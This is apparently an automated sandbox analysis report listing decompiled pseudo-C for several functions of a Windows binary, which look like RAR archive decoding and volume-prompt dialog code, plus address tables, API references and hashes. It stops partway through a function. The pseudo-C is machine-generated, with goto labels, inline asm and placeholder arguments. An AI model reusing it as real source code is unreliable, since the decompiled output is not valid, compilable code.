				_push(_t262);
				_t331 = __ecx;
				_t325 = __ecx + 0xe6b0;
				_t325[1] = _t325[1] & 0x00000000;
				 *_t325 =  *_t325 & 0x00000000;
				_t176 = 0x8000;
				 *(_t342 - 0x10) = _t325;
				if( *(_t342 + 0x10) <= 0x8000) {
					_t176 =  *(_t342 + 0x10);
				}
				E0041BB80(_t262, _t325, _t331,  *((intOrPtr*)(_t331 + 0xe6bc)),  *(_t342 + 0xc), _t176);
				_t346 = _t345 + 0xc;
				 *((intOrPtr*)(_t342 - 0x14)) = _t331 + 0xe678;
				E0040A807(_t331 + 0xe678);
				_t351 =  *(_t342 + 8) & 0x00000080;
				if(( *(_t342 + 8) & 0x00000080) == 0) {
					_t179 =  *(_t331 + 0xe6f0);
					 *(_t342 + 0xc) = _t179;
					_t263 = _t179;
				} else {
					_t263 = E0040A82D(_t351, _t325);
					 *(_t342 + 0xc) = _t263;
					if(_t263 != 0) {
						_t263 = _t263 - 1;
						 *(_t342 + 0xc) = _t263;
					} else {
						E00414E0E(_t331);
					}
				}
				_t180 =  *(_t331 + 0xe6c4);
				if(_t263 > _t180 || _t263 >  *((intOrPtr*)(_t331 + 0xe6e4))) {
					L16:
					_t181 = 0;
					goto L17;
				} else {
					_push(0x70);
					 *(_t331 + 0xe6f0) = _t263;
					 *((char*)(_t342 + 0x13)) = _t263 == _t180;
					_t327 = E0041A18A(_t263, _t318, _t325, _t263 - _t180);
					if(_t327 == 0) {
						_t327 = 0;
						__eflags = 0;
					} else {
						_t22 =  &(_t327[5]); // 0x14
						E00415206(_t22);
					}
					if( *((char*)(_t342 + 0x13)) == 0) {
						_t184 =  *( *((intOrPtr*)(_t331 + 0xe6c0)) + _t263 * 4);
						_t327[4] = _t263;
						_t265 = _t184 + 8;
						 *_t265 =  *_t265 + 1;
						__eflags =  *_t265;
						 *(_t342 - 0x1c) = _t184;
						goto L23;
					} else {
						if(_t263 <= 0x400) {
							E0041251D(_t331 + 0xe6c0, 1);
							_push(0x70);
							_t273 = E0041A18A(_t263, _t318, _t327, __eflags);
							__eflags = _t273;
							if(_t273 == 0) {
								_t273 = 0;
								__eflags = 0;
							} else {
								_t26 = _t273 + 0x14; // 0x14
								E00415206(_t26);
							}
							 *( *((intOrPtr*)(_t331 + 0xe6c0)) +  *(_t331 + 0xe6c4) * 4 - 4) = _t273;
							 *(_t342 - 0x1c) = _t273;
							_t327[4] =  *(_t331 + 0xe6c4) - 1;
							E0041442E(_t331 + 0xe6e0, 0);
							_t265 = _t273 + 8;
							 *_t265 =  *_t265 & 0x00000000;
							L23:
							_t185 = 0;
							 *(_t342 - 0x18) = 0;
							 *(_t342 - 0x20) = 0;
							__eflags =  *(_t331 + 0xe6d4);
							if( *(_t331 + 0xe6d4) <= 0) {
								L30:
								E0041251D(_t331 + 0xe6d0, 1);
								_t320 = 1;
								__eflags = 1;
								L31:
								 *( *((intOrPtr*)(_t331 + 0xe6d0)) + ( *(_t331 + 0xe6d4) - _t320) * 4) = _t327;
								_t327[2] =  *_t265;
								_t190 = E0040A82D(__eflags,  *(_t342 - 0x10));
								__eflags =  *(_t342 + 8) & 0x00000040;
								_t266 = _t190;
								if(( *(_t342 + 8) & 0x00000040) != 0) {
									_t266 = _t266 + 0x102;
									__eflags = _t266;
								}
								__eflags =  *(_t342 + 8) & 0x00000020;
								 *_t327 =  *((intOrPtr*)(_t331 + 0x70)) + _t266 &  *(_t331 + 0xe6f8);
								if(__eflags == 0) {
									_t194 =  *(_t342 + 0xc);
									__eflags = _t194 -  *((intOrPtr*)(_t331 + 0xe6e4));
									if(_t194 >=  *((intOrPtr*)(_t331 + 0xe6e4))) {
										_t195 = 0;
										__eflags = 0;
									} else {
										_t195 =  *( *((intOrPtr*)(_t331 + 0xe6e0)) + _t194 * 4);
									}
									_t327[1] = _t195;
								} else {
									_t248 = E0040A82D(__eflags,  *(_t342 - 0x10));
									_t327[1] = _t248;
									 *( *((intOrPtr*)(_t331 + 0xe6e0)) +  *(_t342 + 0xc) * 4) = _t248;
								}
								_t196 =  *((intOrPtr*)(_t331 + 0x74));
								_t280 =  *((intOrPtr*)(_t331 + 0x70));
								__eflags = _t196 - _t280;
								if(_t196 == _t280) {
									L42:
									_t197 = 0;
									__eflags = 0;
									goto L43;
								} else {
									__eflags = (_t196 - _t280 &  *(_t331 + 0xe6f8)) - _t266;
									if((_t196 - _t280 &  *(_t331 + 0xe6f8)) > _t266) {
										goto L42;
									}
									_t197 = 1;
									L43:
									_t91 =  &(_t327[0x13]); // 0x4c
									_t267 = _t91;
									_t327[3] = _t197;
									E0041A110(_t327, _t267, 0, 0x1c);
									_t327[0x17] = _t327[1];
									_t348 = _t346 + 0xc;
									__eflags =  *(_t342 + 8) & 0x00000010;
									_t327[0x16] = 0x3c000;
									_t327[0x18] = _t327[2];
									if(( *(_t342 + 8) & 0x00000010) == 0) {
										L48:
										__eflags =  *((char*)(_t342 + 0x13));
										if(__eflags == 0) {
											_t333 =  *(_t342 - 0x1c);
											L59:
											_t327[9] =  *(_t333 + 0x14);
											_t327[0xa] =  *(_t333 + 0x28);
											_t203 =  *(_t333 + 0x40);
											 *(_t342 + 0x10) = _t203;
											__eflags = _t203 - 1 - 0x1ffe;
											if(_t203 - 1 <= 0x1ffe) {
												_t136 =  &(_t327[0xf]); // 0x3c
												E00401113(_t136, _t203);
												E0041BB80(_t136, _t327, _t333,  *_t136,  *((intOrPtr*)(_t333 + 0x3c)),  *(_t342 + 0x10));
												_t348 = _t348 + 0xc;
											}
											__eflags = _t327[0xc] - 0x40;
											if(_t327[0xc] < 0x40) {
												_t140 =  &(_t327[0xb]); // 0x2c
												E00412595(_t140);
												E00401113(_t140, 0x40);
											}
											_t141 =  &(_t327[0xb]); // 0x2c
											_t268 = _t141;
											_t334 =  *_t268;
											_t142 =  &(_t327[0x13]); // 0x4c
											 *(_t342 + 0xc) = _t334;
											 *(_t342 + 0x10) = _t142;
											 *(_t342 - 0x20) = 7;
											do {
												E0040A820( *(_t342 + 0xc),  *( *(_t342 + 0x10)));
												 *(_t342 + 0x10) =  *(_t342 + 0x10) + 4;
												 *(_t342 + 0xc) =  *(_t342 + 0xc) + 4;
												_t153 = _t342 - 0x20;
												 *_t153 =  *(_t342 - 0x20) - 1;
												__eflags =  *_t153;
											} while ( *_t153 != 0);
											_t157 = _t334 + 0x1c; // 0x48
											E0040A820(_t157, _t327[1]);
											_t159 = _t334 + 0x20; // 0x4c
											E0040A820(_t159, 0);
											_t162 = _t334 + 0x2c; // 0x58
											E0040A820(_t162, _t327[2]);
											E0041A110(_t327, _t334 + 0x30, 0, 0x10);
											__eflags =  *(_t342 + 8) & 0x00000008;
											if(( *(_t342 + 8) & 0x00000008) == 0) {
												L73:
												_t181 = 1;
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t342 - 0xc));
												return _t181;
											}
											_t214 =  *(_t342 - 0x10);
											__eflags =  *( *(_t342 - 0x10)) + 3 - 0x8000;
											if(__eflags >= 0) {
												goto L16;
											}
											_t215 = E0040A82D(__eflags, _t214);
											 *(_t342 + 8) = _t215;
											__eflags = _t215 - 0x1fc0;
											if(_t215 > 0x1fc0) {
												goto L16;
											}
											_t328 = _t327[0xc];
											_t169 = _t215 + 0x40; // 0x40
											__eflags = _t328 - _t169;
											if(_t328 < _t169) {
												__eflags = _t215 - _t328 + 0x40;
												E00401113(_t268, _t215 - _t328 + 0x40);
											}
											_t329 = 0;
											_t337 =  *_t268 + 0x40;
											__eflags =  *(_t342 + 8);
											if( *(_t342 + 8) <= 0) {
												goto L73;
											} else {
												while(1) {
													_t269 =  *(_t342 - 0x10);
													__eflags =  *_t269 + 3 - 0x8000;
													if( *_t269 + 3 >= 0x8000) {
														goto L16;
													}
													 *((char*)(_t329 + _t337)) = E0040953E(_t269) >> 8;
													E00409527(_t269, 8);
													_t329 = _t329 + 1;
													__eflags = _t329 -  *(_t342 + 8);
													if(_t329 <  *(_t342 + 8)) {
														continue;
													}
													goto L73;
												}
												goto L16;
											}
										}
										_t271 = E0040A82D(__eflags,  *(_t342 - 0x10));
										 *(_t342 + 0x10) = _t271;
										__eflags = _t271 - 0x10000;
										if(_t271 >= 0x10000) {
											goto L16;
										}
										_t339 = 0;
										__eflags = _t271;
										if(_t271 == 0) {
											goto L16;
										}
										E00401306(_t342 - 0x30, _t271);
										__eflags = _t271;
										_t272 =  *(_t342 - 0x30);
										 *(_t342 - 4) = 0;
										if(_t271 <= 0) {
											L54:
											_t333 =  *(_t342 - 0x1c);
											E0040AA63( *((intOrPtr*)(_t342 - 0x14)), _t272,  *(_t342 + 0x10), _t333 + 0x14);
											 *(_t342 - 4) =  *(_t342 - 4) | 0xffffffff;
											__eflags = _t272;
											if(__eflags != 0) {
												_push(_t272);
												E00419DFE(_t272, _t327, _t333, __eflags);
											}
											goto L59;
										} else {
											goto L52;
										}
										while(1) {
											L52:
											_t298 =  *(_t342 - 0x10);
											__eflags =  *( *(_t342 - 0x10)) + 3 - 0x8000;
											if( *( *(_t342 - 0x10)) + 3 >= 0x8000) {
												break;
											}
											 *((char*)(_t272 + _t339)) = E0040953E(_t298) >> 8;
											E00409527( *(_t342 - 0x10), 8);
											_t339 = _t339 + 1;
											__eflags = _t339 -  *(_t342 + 0x10);
											if(_t339 <  *(_t342 + 0x10)) {
												continue;
											}
											goto L54;
										}
										__eflags = _t272;
										if(__eflags != 0) {
											_push(_t272);
											E00419DFE(_t272, _t327, _t339, __eflags);
										}
										goto L16;
									}
									_t341 = E0040953E( *(_t342 - 0x10)) >> 9;
									E00409527( *(_t342 - 0x10), 7);
									_t103 = _t342 + 0xc;
									 *_t103 =  *(_t342 + 0xc) & 0x00000000;
									__eflags =  *_t103;
									do {
										__eflags = _t341 & 1 <<  *(_t342 + 0xc);
										if(__eflags != 0) {
											 *_t267 = E0040A82D(__eflags,  *(_t342 - 0x10));
										}
										 *(_t342 + 0xc) =  *(_t342 + 0xc) + 1;
										_t267 =  &(_t267[1]);
										__eflags =  *(_t342 + 0xc) - 7;
									} while ( *(_t342 + 0xc) < 7);
									goto L48;
								}
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(_t331 + 0xe6d0)) + (_t185 -  *(_t342 - 0x18)) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0xe6d0)) + _t185 * 4));
								_t250 =  *(_t342 - 0x20);
								_t309 =  *((intOrPtr*)(_t331 + 0xe6d0)) + _t250 * 4;
								__eflags =  *_t309;
								if( *_t309 == 0) {
									_t56 = _t342 - 0x18;
									 *_t56 =  *(_t342 - 0x18) + 1;
									__eflags =  *_t56;
								}
								_t320 =  *(_t342 - 0x18);
								__eflags = _t320;
								if(_t320 > 0) {
									 *_t309 =  *_t309 & 0x00000000;
									__eflags =  *_t309;
								}
								_t185 = _t250 + 1;
								 *(_t342 - 0x20) = _t185;
								__eflags = _t185 -  *(_t331 + 0xe6d4);
							} while (_t185 <  *(_t331 + 0xe6d4));
							__eflags = _t320;
							if(__eflags != 0) {
								goto L31;
							}
							goto L30;
						}
						if(_t327 != 0) {
							E00414AA5(_t263, _t327, _t327, _t342, 1);
						}
						goto L16;
					}
				}
			}

0x004162c9
0x004162ce
0x004162d3
0x004162d6
0x004162d8
0x004162db
0x004162e1
0x004162e5
0x004162e8
0x004162f0
0x004162f3
0x004162f5
0x004162f5
0x00416302
0x0041630d
0x00416310
0x00416313
0x00416318
0x0041631c
0x0041633c
0x00416342
0x00416345
0x0041631e
0x00416324
0x00416326
0x0041632b
0x00416336
0x00416337
0x0041632d
0x0041632f
0x0041632f
0x0041632b
0x00416347
0x0041634f
0x0041639e
0x0041639e
0x00000000
0x00416359
0x0041635b
0x0041635d
0x00416363
0x0041636c
0x00416371
0x0041637d
0x0041637d
0x00416373
0x00416373
0x00416376
0x00416376
0x00416383
0x00416410
0x00416413
0x00416416
0x00416419
0x00416419
0x0041641b
0x00000000
0x00416389
0x0041638f
0x004163b9
0x004163be
0x004163c5
0x004163c8
0x004163ca
0x004163d6
0x004163d6
0x004163cc
0x004163cc
0x004163cf
0x004163cf
0x004163e4
0x004163f7
0x004163fa
0x004163fd
0x00416402
0x00416405
0x0041641e
0x0041641e
0x00416420
0x00416423
0x00416426
0x0041642c
0x00416473
0x0041647b
0x00416482
0x00416482
0x00416483
0x00416494
0x00416499
0x0041649c
0x004164a1
0x004164a5
0x004164a7
0x004164a9
0x004164a9
0x004164a9
0x004164ba
0x004164be
0x004164c0
0x004164db
0x004164de
0x004164e4
0x004164f1
0x004164f1
0x004164e6
0x004164ec
0x004164ec
0x004164f3
0x004164c2
0x004164c5
0x004164cd
0x004164d6
0x004164d6
0x004164f6
0x004164f9
0x004164fc
0x004164fe
0x00416511
0x00416511
0x00416511
0x00000000
0x00416500
0x00416508
0x0041650a
0x00000000
0x00000000
0x0041650e
0x00416513
0x00416515
0x00416515
0x0041651b
0x0041651e
0x00416526
0x0041652c
0x0041652f
0x00416533
0x0041653a
0x0041653d
0x0041657c
0x0041657c
0x00416580
0x0041661e
0x00416621
0x00416624
0x0041662a
0x0041662d
0x00416633
0x00416636
0x0041663c
0x0041663e
0x00416644
0x00416651
0x00416656
0x00416656
0x00416659
0x0041665d
0x0041665f
0x00416664
0x0041666d
0x0041666d
0x00416672
0x00416672
0x00416675
0x00416677
0x0041667a
0x0041667d
0x00416680
0x00416687
0x00416692
0x00416697
0x0041669b
0x0041669f
0x0041669f
0x0041669f
0x0041669f
0x004166aa
0x004166ae
0x004166b8
0x004166bc
0x004166c7
0x004166cb
0x004166d8
0x004166e0
0x004166e4
0x00416760
0x00416760
0x004163a0
0x004163a6
0x004163ae
0x004163ae
0x004166e6
0x004166ee
0x004166f4
0x00000000
0x00000000
0x004166fb
0x00416700
0x00416703
0x00416708
0x00000000
0x00000000
0x0041670e
0x00416711
0x00416714
0x00416716
0x0041671a
0x00416720
0x00416720
0x00416727
0x00416729
0x0041672c
0x0041672f
0x00000000
0x00416731
0x00416731
0x00416731
0x00416739
0x0041673e
0x00000000
0x00000000
0x00416752
0x00416755
0x0041675a
0x0041675b
0x0041675e
0x00000000
0x00000000
0x00000000
0x0041675e
0x00000000
0x00416731
0x0041672f
0x0041658e
0x00416590
0x00416593
0x00416599
0x00000000
0x00000000
0x0041659f
0x004165a1
0x004165a3
0x00000000
0x00000000
0x004165ad
0x004165b2
0x004165b4
0x004165b7
0x004165ba
0x004165e6
0x004165e6
0x004165f4
0x004165f9
0x004165fd
0x004165ff
0x00416601
0x00416602
0x00416607
0x00000000
0x00000000
0x00000000
0x00000000
0x004165bc
0x004165bc
0x004165bc
0x004165c4
0x004165c9
0x00000000
0x00000000
0x004165d8
0x004165db
0x004165e0
0x004165e1
0x004165e4
0x00000000
0x00000000
0x00000000
0x004165e4
0x0041660a
0x0041660c
0x00416612
0x00416613
0x00416618
0x00000000
0x0041660c
0x0041654e
0x00416551
0x00416556
0x00416556
0x00416556
0x0041655a
0x00416562
0x00416564
0x0041656e
0x0041656e
0x00416570
0x00416573
0x00416576
0x00416576
0x00000000
0x0041655a
0x00000000
0x00000000
0x00000000
0x0041642e
0x0041642e
0x00416442
0x0041644b
0x0041644e
0x00416451
0x00416454
0x00416456
0x00416456
0x00416456
0x00416456
0x00416459
0x0041645c
0x0041645e
0x00416460
0x00416460
0x00416460
0x00416463
0x00416464
0x00416467
0x00416467
0x0041646f
0x00416471
0x00000000
0x00000000
0x00000000
0x00416471
0x00416393
0x00416399
0x00416399
0x00000000
0x00416393
0x00416383

APIs

__EH_prolog.LIBCMT ref: 004162CE

Part of subcall function 0041251D: _realloc.LIBCMT ref: 00412575

Part of subcall function 0041A18A: _malloc.LIBCMT ref: 0041A1A4

_memset.LIBCMT ref: 0041651E
_memset.LIBCMT ref: 004166D8

Strings

, xrefs: 004164BA

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$H_prolog_malloc_realloc
String ID:
API String ID: 1826288403-3916222277
Opcode ID: ef17e2e93f0bd8c57614a419d43f1c5a355b8f1d42af9627f23112e91e15134b
Instruction ID: 34d20b7b7c15af370f5f75c9a99aa4c31e139fe048dabe289bd9c415d2f87bb6
Opcode Fuzzy Hash: ef17e2e93f0bd8c57614a419d43f1c5a355b8f1d42af9627f23112e91e15134b
Instruction Fuzzy Hash: C2E1B371A00749AFCB10DF64D981BEEB7B1FF04308F11482EE866A7681D739E991CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418659, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00418659(intOrPtr __edx, intOrPtr* _a4, char _a7, signed int _a8, char _a11, short _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v4120;
				char _v8216;
				void* __ebx;
				void* __ebp;
				intOrPtr _t93;
				intOrPtr _t107;
				signed int _t116;
				signed int _t123;
				intOrPtr _t137;
				signed int _t150;
				intOrPtr _t151;
				intOrPtr* _t157;
				intOrPtr* _t166;
				intOrPtr _t178;
				intOrPtr _t180;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr* _t187;
				void* _t188;

				_t178 = __edx;
				E0041A3E0(0x2014);
				_t187 = _a4;
				_v12 =  *((intOrPtr*)(_t187 + 0x5704));
				_t93 =  *((intOrPtr*)(_t187 + 0x5724));
				_v16 = _t93;
				if(_t93 != 3) {
					_t151 = _t187 + 0x57c8;
					_v8 = _t151;
					_t180 = _t151;
					__eflags = _t93 - 2;
					if(__eflags != 0) {
						L4:
						_a7 = 0;
						L5:
						_t150 = _a8;
						if(_t150 == 0 || _a7 == 0) {
							L12:
							_v24 =  *((intOrPtr*)( *_t187 + 0x10))();
							_v20 = _t178;
							if(_t150 != 0) {
								 *((intOrPtr*)(_t150 + 0x1890)) =  *((intOrPtr*)(_t150 + 0x1890)) + E00408B84(_t187, _t178);
								asm("adc [edi+0x4], edx");
							}
							E004087BE(_t187);
							E0040A394( &_v4120, 0x800, (E0041A0EF( &_v4120, _t187 + 0x1e) & 0xffffff00 |  *((char*)(_t187 + 0xa23a)) == 0x00000000) & 0x000000ff);
							asm("sbb edi, edi");
							_a11 = 0;
							_t183 =  ~( *(_v12 + 0x5195) & 0x000000ff) & 0x00000004;
							while(1) {
								_push(_t183);
								_push( &_v4120);
								_t157 = _t187;
								if( *((intOrPtr*)( *_t187 + 4))() != 0) {
									break;
								}
								__eflags = _t150;
								if(_t150 != 0) {
									 *(_t150 + 0x1898) =  *(_t150 + 0x1898) & 0x00000000;
									_t38 = _t150 + 0x189c;
									 *_t38 =  *(_t150 + 0x189c) & 0x00000000;
									__eflags =  *_t38;
								}
								__eflags = _a11;
								if(_a11 != 0) {
									L19:
									_t107 = _v12;
									__eflags =  *((char*)(_t107 + 0x517c));
									if( *((char*)(_t107 + 0x517c)) != 0) {
										L25:
										E004012DD(0x44,  &_v4120);
										 *((intOrPtr*)( *_t187 + 4))(_t187 + 0x1e, _t183);
										 *((intOrPtr*)( *_t187 + 0xc))(_v24, _v20, 0);
										return 0;
									}
									_t116 = L004114F9(_t157,  &_v4120, 0x800);
									__eflags = _t116;
									if(_t116 == 0) {
										goto L25;
									}
									continue;
								} else {
									E0041A0EF( &_v8216, _t187 + 0x1e);
									E0040A394( &_v8216, 0x800, 1);
									_t157 = _t187;
									_a11 = 1;
									_t123 =  *((intOrPtr*)( *_t187 + 4))( &_v8216, _t183);
									__eflags = _t123;
									if(_t123 != 0) {
										E0041A0EF( &_v4120,  &_v8216);
										break;
									}
									goto L19;
								}
							}
							E0041123B((_t187 + 0x0000001e & 0xffffff00 | _a16 != 0x00000054) & 0x000000ff, (_t187 + 0x0000001e & 0xffffff00 | _a16 != 0x00000054) & 0x000000ff, _t187 + 0x1e);
							E00401A23(_t187, _t178, _t188, _a16 - 0x54, 1);
							_t202 = _a7;
							_t166 = _t187;
							if(_a7 == 0) {
								E0040363F(_t178, _t188);
							} else {
								E004036AE(_t166, _t178, _t202, _v16);
							}
							if( *((intOrPtr*)(_t187 + 0x5724)) == 2) {
								E00401A98(_t187);
								_t178 =  *((intOrPtr*)(_t187 + 0xa22c));
								asm("sbb edx, [esi+0x6814]");
								 *((intOrPtr*)( *_t187 + 0xc))( *((intOrPtr*)(_t187 + 0xa228)) -  *((intOrPtr*)(_t187 + 0x6810)), _t178, 0);
							}
							if(_t150 != 0) {
								_t184 = _v8;
								if(_v16 != 5) {
									 *((char*)(_t150 + 0x185f)) =  *((intOrPtr*)(_t184 + 0x1089));
									 *((intOrPtr*)(_t150 + 0x20)) =  *((intOrPtr*)(_t184 + 0x1048));
									 *((intOrPtr*)(_t150 + 0x24)) =  *((intOrPtr*)(_t184 + 0x104c));
								} else {
									 *((char*)(_t150 + 0x185f)) = 0;
								}
								_t137 = E00408B84(_t187, _t178);
								 *(_t150 + 0x1880) =  *(_t150 + 0x1880) & 0x00000000;
								 *(_t150 + 0x1884) =  *(_t150 + 0x1884) & 0x00000000;
								 *((intOrPtr*)(_t150 + 0x1868)) = _t137;
								 *((intOrPtr*)(_t150 + 0x186c)) = _t178;
								E004095F2(_t150 + 0x18a0,  *((intOrPtr*)(_t184 + 0x1060)),  *((intOrPtr*)(_v12 + 0x7298)));
							}
							return 1;
						} else {
							if( *((intOrPtr*)(_t187 + 0xa230)) == 3) {
								L10:
								asm("sbb ecx, ecx");
								if(E00409856(_t150, _t150 + 0x18a0, _t178, _t195, _t180 + 0x1060,  ~( *(_t180 + 0x10ba) & 0x000000ff) & _t180 + 0x000010bb) == 0) {
									E004062C8(5, _t187 + 0x1e, _t180 + 0x20);
								}
								goto L12;
							}
							if( *((char*)(_t180 + 0x19)) < 0x14) {
								goto L12;
							}
							_t195 =  *((intOrPtr*)(_t180 + 0x1064)) - 0xffffffff;
							if( *((intOrPtr*)(_t180 + 0x1064)) == 0xffffffff) {
								goto L12;
							}
							goto L10;
						}
					}
					L3:
					_a7 = 1;
					if( *((char*)(_t180 + 0x1089)) != 0) {
						goto L5;
					}
					goto L4;
				}
				_t180 = _t187 + 0x7b08;
				_v8 = _t180;
				goto L3;
			}

0x00418659
0x00418661
0x00418668
0x00418671
0x00418674
0x0041867b
0x00418681
0x0041868e
0x00418694
0x00418697
0x00418699
0x0041869c
0x004186ab
0x004186ab
0x004186af
0x004186af
0x004186b4
0x0041870d
0x00418714
0x00418717
0x0041871c
0x0041872b
0x0041872d
0x0041872d
0x00418732
0x00418763
0x00418774
0x00418776
0x0041877a
0x004187f4
0x004187f6
0x004187fd
0x004187fe
0x00418805
0x00000000
0x00000000
0x0041877f
0x00418781
0x00418783
0x0041878a
0x0041878a
0x0041878a
0x0041878a
0x00418791
0x00418795
0x004187d3
0x004187d3
0x004187d6
0x004187dd
0x00418852
0x0041885b
0x00418869
0x00418878
0x00000000
0x0041887b
0x004187eb
0x004187f0
0x004187f2
0x00000000
0x00000000
0x00000000
0x00418797
0x004187a2
0x004187b7
0x004187c6
0x004187c8
0x004187cc
0x004187cf
0x004187d1
0x00418849
0x00000000
0x0041884f
0x00000000
0x004187d1
0x00418795
0x0041881b
0x00418824
0x00418829
0x0041882d
0x0041882f
0x00418882
0x00418831
0x00418834
0x00418834
0x0041888e
0x00418892
0x004188a3
0x004188a9
0x004188b7
0x004188b7
0x004188bc
0x004188c2
0x004188c5
0x004188d6
0x004188e2
0x004188eb
0x004188c7
0x004188c7
0x004188c7
0x004188f0
0x004188f5
0x004188fc
0x00418903
0x0041890c
0x00418924
0x00418924
0x00000000
0x004186bc
0x004186c3
0x004186d4
0x004186dd
0x004186fc
0x00418708
0x00418708
0x00000000
0x004186fc
0x004186c9
0x00000000
0x00000000
0x004186cb
0x004186d2
0x00000000
0x00000000
0x00000000
0x004186d2
0x004186b4
0x0041869e
0x004186a5
0x004186a9
0x00000000
0x00000000
0x00000000
0x004186a9
0x00418683
0x00418689
0x00000000

APIs

_wcscpy.LIBCMT ref: 00418742
_wcscpy.LIBCMT ref: 004187A2
_wcscpy.LIBCMT ref: 00418849

Strings

T, xrefs: 0041880B

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy
String ID: T
API String ID: 3048848545-3187964512
Opcode ID: 2af8f53a682b1164ebfdd2f7fe18f8fc682866b43eb6ec3b5a0d83afca90aa6b
Instruction ID: 91968e6f8ad0c68816c2e655f1df4d99e40e3ae2f43c95d80535e933a6012e24
Opcode Fuzzy Hash: 2af8f53a682b1164ebfdd2f7fe18f8fc682866b43eb6ec3b5a0d83afca90aa6b
Instruction Fuzzy Hash: 7291F771600344AFDF24DF64C844BEAB7F9AF05310F14456FE9999B282CF78AA84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040D263, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040D263(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t17;
				void* _t21;
				void* _t24;
				void* _t27;
				void* _t29;
				struct HWND__* _t31;
				WCHAR** _t32;

				_t32 = _a16;
				_t31 = _a4;
				if(E00406056(__edx, _t31, _a8, _a12, _t32, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t12 = _a8 - 0x110;
				if(_t12 == 0) {
					_push( *_t32);
					 *0x44c3ec = _t32;
					L13:
					SetDlgItemTextW(_t31, 0x65, ??);
					goto L14;
				}
				if(_t12 != 1) {
					L6:
					return 0;
				}
				_t17 = (_a12 & 0x0000ffff) - 1;
				if(_t17 == 0) {
					GetDlgItemTextW(_t31, 0x65,  *( *0x44c3ec), ( *0x44c3ec)[1]);
					_push(1);
					L10:
					EndDialog(_t31, ??);
					goto L14;
				}
				_t21 = _t17 - 1;
				if(_t21 == 0) {
					_push(0);
					goto L10;
				}
				if(_t21 == 0x64) {
					_t24 = E0040A0CE(__eflags,  *( *0x44c3ec));
					_t27 = E00405104(_t29, _t31, E0040C05C(0x8e),  *( *0x44c3ec), _t24, 0);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L14;
					}
					_push( *( *0x44c3ec));
					goto L13;
				}
				goto L6;
			}

0x0040d267
0x0040d26b
0x0040d286
0x0040d313
0x0040d315
0x00000000
0x0040d315
0x0040d28f
0x0040d294
0x0040d302
0x0040d304
0x0040d30a
0x0040d30d
0x00000000
0x0040d30d
0x0040d297
0x0040d2a8
0x00000000
0x0040d2a8
0x0040d29d
0x0040d29e
0x0040d2f8
0x0040d2fe
0x0040d2e2
0x0040d2e3
0x00000000
0x0040d2e3
0x0040d2a0
0x0040d2a1
0x0040d2e0
0x00000000
0x0040d2e0
0x0040d2a6
0x0040d2b5
0x0040d2ce
0x0040d2d3
0x0040d2d5
0x00000000
0x00000000
0x0040d2dc
0x00000000
0x0040d2dc
0x00000000

APIs

EndDialog.USER32(?,00000001), ref: 0040D2E3
GetDlgItemTextW.USER32 ref: 0040D2F8
SetDlgItemTextW.USER32 ref: 0040D30D

Strings

ASKNEXTVOL, xrefs: 0040D272

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$Dialog
String ID: ASKNEXTVOL
API String ID: 1770891597-3402441367
Opcode ID: 5681098e964f4dbd5ca5c625023702d5e77690a30e8e3d7e1d28ad4462d455ef
Instruction ID: 64c061c7ccafa75b910cf23fc69f305e9baec44c98089b5c0624331e8ff32f70
Opcode Fuzzy Hash: 5681098e964f4dbd5ca5c625023702d5e77690a30e8e3d7e1d28ad4462d455ef
Instruction Fuzzy Hash: 07119635640105FBDA219FD4DC85F6A3BA9EB4AB01F044076FA01FB1E0C3B99815D76E

Uniqueness

Uniqueness Score: -1.00%

Function 0041207F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041207F(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v28;
				void* __ebx;
				void* __edi;
				intOrPtr _t25;
				signed int _t30;
				signed int _t31;
				intOrPtr _t35;
				signed int _t40;
				void* _t41;
				signed int _t42;
				signed int _t46;
				signed int _t47;
				unsigned int _t48;
				void* _t51;

				_v16 = __ecx;
				_t25 = E0041205E(__ecx);
